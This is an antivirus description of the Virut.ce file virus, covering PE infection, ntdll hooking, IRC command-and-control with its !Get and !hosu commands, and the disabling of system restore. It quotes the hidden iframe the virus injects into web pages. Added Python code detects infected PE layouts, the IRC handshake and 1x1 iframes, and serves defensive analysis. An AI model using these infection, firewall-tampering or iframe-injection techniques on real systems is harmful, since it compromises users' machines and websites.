Virus.Win32.Virut.ce

Technical Details

This file virus infects Windows executable files. The malicious code is contained in Windows PE EXE files. The virus body is about 17 Kb, though the use of polymorphic encryption means its size may vary.


Propagation


The virus injects its code into the address spaces of all the processes running in the system. The injected code intercepts the following system functions in the ntdll.dll library:

NtCreateFile
NtCreateProcess
NtCreateProcessEx
NtOpenFile
NtQueryInformationProcess

Using these system functions, the virus tracks files that are opened and any applications launched for execution. When the virus detects a new process being launched or an executable file being opened, it infects that file. Files with .EXE and .SCR extensions are infected; these are Windows (PE EXE) applications. The virus does not infect files whose names contain any of the following strings: “WINC”, “WCUN”, “WC32”, “PSTO”. When infecting a file, the virus expands the PE section and writes its own polymorphic body into it. It then modifies the program’s entry point so that it leads to the virus code.
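An added example, not part of this description: a Python check that walks the PE section table and flags executables whose entry point lands in the final section, the layout an appending infector of the kind described above leaves behind, together with the extension and name-string filter the virus applies when choosing targets. It assumes the expanded section is the last one (the page does not say which section is grown) and that the name comparison is case-insensitive; the PE images it checks are constructed headers-only stubs built for the demo, not real binaries.

```python
import struct

# Exclusion strings from the description: the virus skips files whose name
# contains any of them.  Compared case-insensitively here, which is an
# assumption; the page does not state the case rule.
EXCLUDED_NAME_FRAGMENTS = ("winc", "wcun", "wc32", "psto")
INFECTABLE_EXTENSIONS = (".exe", ".scr")


def is_candidate_file(filename):
    """Would the virus even consider this file: right extension, no exclusion string."""
    lowered = filename.lower()
    if not lowered.endswith(INFECTABLE_EXTENSIONS):
        return False
    return not any(frag in lowered for frag in EXCLUDED_NAME_FRAGMENTS)


def parse_pe(data):
    """Minimal PE32 header walk: returns (entry_rva, [(name, va, vsize, rawsize), ...])."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4                      # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20                          # IMAGE_OPTIONAL_HEADER
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    table = opt + opt_size                   # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(num_sections):
        off = table + 40 * i
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va, rawsize = struct.unpack_from("<III", data, off + 8)
        sections.append((name, va, vsize, rawsize))
    return entry_rva, sections


def entry_point_in_last_section(data):
    """Heuristic for an appending infector: does the entry point land in the
    final section?  Packers trigger this too, so treat a hit as a lead, not proof."""
    entry_rva, sections = parse_pe(data)
    if not sections:
        return False
    _, va, vsize, rawsize = sections[-1]
    return va <= entry_rva < va + max(vsize, rawsize)


def build_pe(entry_rva, sections):
    """Construct a headers-only PE32 image for the demo (constructed data, not a
    real binary).  `sections` is a list of (name, va, vsize, rawsize)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)            # e_lfanew: NT headers follow the DOS header
    opt_size = 224                                   # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)            # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)       # AddressOfEntryPoint
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("ascii").ljust(8, b"\0"),
                    vsize, va, rawsize, 0, 0, 0, 0, 0, 0x60000020)
        for name, va, vsize, rawsize in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table


def demo():
    """A clean layout next to an infected-looking one (last section grown, entry moved)."""
    clean = build_pe(0x1000, [(".text", 0x1000, 0x400, 0x400),
                              (".data", 0x2000, 0x200, 0x200)])
    infected = build_pe(0x2300, [(".text", 0x1000, 0x400, 0x400),
                                 (".data", 0x2000, 0x4600, 0x4600)])
    return entry_point_in_last_section(clean), entry_point_in_last_section(infected)


if __name__ == "__main__":
    print("clean, infected-looking:", demo())
    for name in ("game.scr", "WINCLIENT.exe", "readme.txt"):
        print(name, "candidate" if is_candidate_file(name) else "skipped")
```

The heuristic is deliberately loose: a polymorphic body has no stable byte signature, so a scanner has to lean on structural clues such as the entry point moving into a grown last section, and then confirm with emulation or a proper engine.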

Payload

The virus adds the executable file of the host process to the Windows firewall list of trusted applications.


Then it disables the “Restore system files” function.


The virus attempts to contact the following IRC servers:

prox*****ircgalaxy.pl
irc*****ef.pl

If a connection is established, the virus sends the following commands to the server:
NICK dewxxpyi
USER b
JOIN #.<rnd1>, where rnd1 is a random number.

Then the virus enters standby mode, ready to receive commands from the malicious IRC server and execute them.


The virus is capable of executing the following commands:

  • !Get: download a malicious code from the Internet and inject it into processes running on the victim computer.
  • !hosu: open specified URLs on the victim computer.
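An added example, not code from this description: detection logic in Python that replays client-to-server IRC lines and alerts when one flow completes the NICK, USER b, JOIN #.<number> sequence quoted above, plus a second pass that flags server-sent !Get and !hosu commands. The log format and the addresses are constructed for the demo (the page masks the real server names), and matching the NICK on its shape (eight lowercase letters, from the one sample value shown) rather than the literal string is an assumption.

```python
import re
from collections import defaultdict

# Handshake shape from the description: NICK <8 lowercase letters>, USER b,
# JOIN #.<number>.  Only one NICK value is quoted on the page, so matching its
# shape instead of the literal value is an assumption.
NICK_RE = re.compile(r"^NICK ([a-z]{8})$")
USER_RE = re.compile(r"^USER b(?:\s|$)")
JOIN_RE = re.compile(r"^JOIN (#\.\d+)$")
# Commands the page says the bot accepts; matched in server-to-client text.
CMD_RE = re.compile(r"(?:^|\s):?!(Get|hosu)\b")

# Constructed log format (assumption, not a real sensor's output):
# "<src>-><dst> <C2S|S2C> <raw IRC line>"
LOG_RE = re.compile(r"^(?P<flow>\S+) (?P<dir>C2S|S2C) (?P<msg>.*)$")


def find_virut_handshakes(lines):
    """Return (flow, nick, channel) for every client flow that completes the
    NICK -> USER b -> JOIN #.<n> sequence, in that order."""
    state = defaultdict(dict)
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("dir") != "C2S":
            continue                      # only client-to-server traffic matters here
        flow, msg = m.group("flow"), m.group("msg").rstrip("\r\n")
        st = state[flow]
        nick = NICK_RE.match(msg)
        join = JOIN_RE.match(msg)
        if nick:
            st["nick"] = nick.group(1)
        elif USER_RE.match(msg) and "nick" in st:
            st["user_b"] = True
        elif join and st.get("user_b"):
            hits.append((flow, st["nick"], join.group(1)))
            st.clear()                    # one alert per completed handshake
    return hits


def find_bot_commands(lines):
    """Return (flow, command) for server-to-client lines carrying !Get or !hosu."""
    found = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("dir") != "S2C":
            continue
        c = CMD_RE.search(m.group("msg"))
        if c:
            found.append((m.group("flow"), c.group(1)))
    return found


# Constructed sample: one infected host and one ordinary IRC user.  Server
# addresses are documentation ranges, not the masked hosts on the page.
SAMPLE_LOG = """\
10.0.0.5:49152->203.0.113.7:6667 C2S NICK dewxxpyi
10.0.0.5:49152->203.0.113.7:6667 C2S USER b
10.0.0.5:49152->203.0.113.7:6667 S2C :irc 001 dewxxpyi :Welcome
10.0.0.5:49152->203.0.113.7:6667 C2S JOIN #.48213
10.0.0.5:49152->203.0.113.7:6667 S2C :op!u@h PRIVMSG #.48213 :!hosu http://example.invalid/
10.0.0.9:50001->198.51.100.2:6667 C2S NICK alice
10.0.0.9:50001->198.51.100.2:6667 C2S USER alice 0 * :Alice
10.0.0.9:50001->198.51.100.2:6667 C2S JOIN #python
""".splitlines()

if __name__ == "__main__":
    for flow, nick, chan in find_virut_handshakes(SAMPLE_LOG):
        print(f"ALERT Virut-style IRC handshake on {flow}: nick={nick} channel={chan}")
    for flow, cmd in find_bot_commands(SAMPLE_LOG):
        print(f"ALERT bot command !{cmd} seen on {flow}")
```

Requiring the whole ordered sequence on one flow, rather than alerting on any USER b line, keeps the rule quiet on ordinary IRC clients; the channel name shape #.<digits> is the strongest single token, since real channels rarely look like that.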


The virus also scans the victim computer’s hard drive for files with the following extensions:

HTM
PHP
ASP

If found, it inserts the following string into them:

<iframe src="http://****.pl/rc/" width=1 height=1 style="border:0"></iframe>
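An added example, not part of this description: a Python scanner for the web files the virus targets that reports iframes of the shape shown above (1x1 pixels, or hidden by style). The page masks the injected URL, so the sample below uses a placeholder host, and the HTML it scans is constructed for the demo.

```python
import re

# File types the description says the virus modifies.
WEB_EXTENSIONS = {"htm", "php", "asp"}

IFRAME_RE = re.compile(r"<iframe\b(?P<attrs>[^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(
    r"""\b(?P<name>[a-zA-Z:-]+)\s*=\s*(?:"(?P<dq>[^"]*)"|'(?P<sq>[^']*)'|(?P<bare>[^\s"'>]+))""")
HIDDEN_STYLE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)


def is_web_file(path):
    """Only the extensions the virus targets get the regex pass."""
    return path.lower().rsplit(".", 1)[-1] in WEB_EXTENSIONS


def _px(value):
    """'1', '1px' -> 1; anything else -> None."""
    try:
        return int(re.sub(r"px$", "", value.strip().lower()))
    except ValueError:
        return None


def find_hidden_iframes(html):
    """Return one finding per iframe that is 1x1 (or smaller) or styled invisible."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = {}
        for am in ATTR_RE.finditer(m.group("attrs")):
            attrs[am.group("name").lower()] = (am.group("dq") or am.group("sq")
                                                or am.group("bare") or "")
        sizes = [_px(attrs.get(k, "")) for k in ("width", "height")]
        tiny = all(s is not None and s <= 1 for s in sizes)
        hidden = bool(HIDDEN_STYLE_RE.search(attrs.get("style", "")))
        if tiny or hidden:
            findings.append({"offset": m.start(), "src": attrs.get("src"),
                             "reason": "1x1 frame" if tiny else "hidden by style"})
    return findings


def scan_file(path, content):
    """Apply the iframe check only to files of the targeted types."""
    return find_hidden_iframes(content) if is_web_file(path) else []


# Constructed page: a legitimate embed plus a Virut-style insertion after the
# closing tag.  The real src is masked on the page; a placeholder host is used.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="https://maps.example.org/embed" width="600" height="400"></iframe>
</body></html>
<iframe src="http://PLACEHOLDER.invalid/rc/" width=1 height=1 style="border:0"></iframe>
"""

if __name__ == "__main__":
    for f in scan_file("index.htm", SAMPLE_HTML):
        print(f"suspicious iframe at byte {f['offset']}: src={f['src']} ({f['reason']})")
```

A 1x1 frame is not malicious on its own (analytics beacons use the same trick), so in practice the finding is joined with the frame's destination and with whether the file's modification time moved without a deploy.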

Removal Instructions

If your computer does not have an up-to-date antivirus, or has no antivirus solution at all, follow the instructions below to delete the malicious program: update your Kaspersky Anti-Virus databases and perform a full scan of the computer.